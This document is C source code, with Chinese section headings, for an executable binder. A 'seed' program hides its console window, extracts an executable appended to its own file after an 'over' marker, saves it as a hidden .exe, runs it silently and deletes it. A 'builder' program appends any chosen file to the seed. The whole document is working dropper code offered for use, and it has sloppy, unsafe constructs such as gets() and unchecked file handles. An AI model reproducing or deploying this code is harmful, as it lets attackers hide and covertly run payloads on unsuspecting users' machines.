种子程序源码:
#include<stdio.h>
#include<string.h>
#include<windows.h>
int FileLastAddr=0;
const char FESymbol[5]="over";
bool ifExist(char* FileName)
{
char SymbolTemp[5];
FILE *fp=fopen(FileName,"rb");
fseek(fp,-(sizeof(FESymbol)),SEEK_END);
fread(SymbolTemp,sizeof(char),5,fp);
fclose(fp);
if(!strcmp(FESymbol,SymbolTemp)){
return true;
}
return false;
}
void GetExe(char* FileName){
long FileLength;
char Buff[1024];
char NewName[255];
FILE *fp=fopen(FileName,"rb");
fseek(fp,-(sizeof(FESymbol)+sizeof(long)),SEEK_END);
fread(&FileLength,sizeof(int),1,fp);
fseek(fp,-(sizeof(FESymbol)+sizeof(long)+FileLength),SEEK_END);
strcpy(NewName,FileName);
strcat(NewName,".exe");
DeleteFile(NewName);
FILE *NO=fopen(NewName,"wb+");
while(FileLength>0){
fread(Buff,sizeof(char),FileLength>1024?1024:FileLength,fp);
fwrite(Buff,sizeof(char),FileLength>1024?1024:FileLength,NO);
FileLength-=1024;
}
fclose(fp);
SetFileAttributes(NewName, FILE_ATTRIBUTE_HIDDEN);
fclose(NO);
STARTUPINFO si={sizeof(si)};
PROCESS_INFORMATION pi;
CreateProcess(NULL,NewName,NULL,NULL,false,NORMAL_PRIORITY_CLASS,NULL,NULL,&si,&pi);
WaitForSingleObject(pi.hThread,INFINITE);
DeleteFile(NewName);
}
int main(int args,char*argv[]){
HANDLE hCon = GetStdHandle(STD_OUTPUT_HANDLE);
char szTitle[256];
GetConsoleTitle(szTitle,256);
HWND hWin = FindWindow("ConsoleWindowClass",szTitle);
ShowWindow(hWin,FALSE);
if(ifExist(argv[0]))
GetExe(argv[0]);
return 0;
}
制作程序源码:
#include<stdio.h>
#include<string.h>
#include<windows.h>
const char FESymbol[5]="over";
void Write(char* FileName)
{
FILE *fp=fopen("ExeInject.exe","rb+");
if(~fseek(fp,0l,2))printf("Read Orginal File Successful!\n");
long FileLength=0;
int thiso=-1;
char Buff[1024];
FILE *S=fopen(FileName,"rb");
fseek(S,0,0);
while(thiso)
{
thiso=fread(Buff,sizeof(char),1024,S);
fwrite(Buff,sizeof(char),thiso,fp);
FileLength+=thiso;
}
fwrite(&FileLength,sizeof(long),1,fp);
fwrite(FESymbol,sizeof(char),5,fp);
fclose(fp);
}
bool isExist(char* FileName)
{
char SymbolTemp[5];
FILE *fp=fopen(FileName,"rb");
fseek(fp,-sizeof(FESymbol),SEEK_END);
fread(SymbolTemp,sizeof(char),5,fp);
fclose(fp);
if(strcmp(FESymbol,SymbolTemp))return false;
long FileLength;
char Buff[1024];
char NewName[255]="ExeInject.exe";
fp=fopen(FileName,"rb");
fseek(fp,-(sizeof(FESymbol)+sizeof(long)),SEEK_END);
fread(&FileLength,sizeof(int),1,fp);
fseek(fp,-(sizeof(FESymbol)+sizeof(long)+FileLength),SEEK_END);
DeleteFile(NewName);
FILE *NO=fopen(NewName,"wb+");
int nowread=0;
while(FileLength>0){
nowread=fread(Buff,sizeof(char),FileLength>1024?1024:FileLength,fp);
fwrite(Buff,sizeof(char),FileLength>nowread?nowread:FileLength,NO);
FileLength-=nowread;
}
fclose(fp);
fclose(NO);
return true;
}
int main(int args,char* argv[])
{
if(isExist(argv[0])){
printf("BindFile:");
char FileName[255];
gets(FileName);
Write(FileName);
}
else{
FILE *fp=fopen(argv[0],"r+");
if(!fp)printf("Fuck!!!!");
long FileLength=0;
int thiso=-1;
char Buff[1024];
FILE *S=fopen("ExeInject.exe","rb+");
fseek(S,0,0);
while(thiso)
{
thiso=fread(Buff,sizeof(char),1024,S);
fwrite(Buff,sizeof(char),thiso,fp);
FileLength+=thiso;
}
fwrite(&FileLength,sizeof(long),1,fp);
fwrite(FESymbol,sizeof(char),5,fp);
fclose(fp);
}
return 0;
}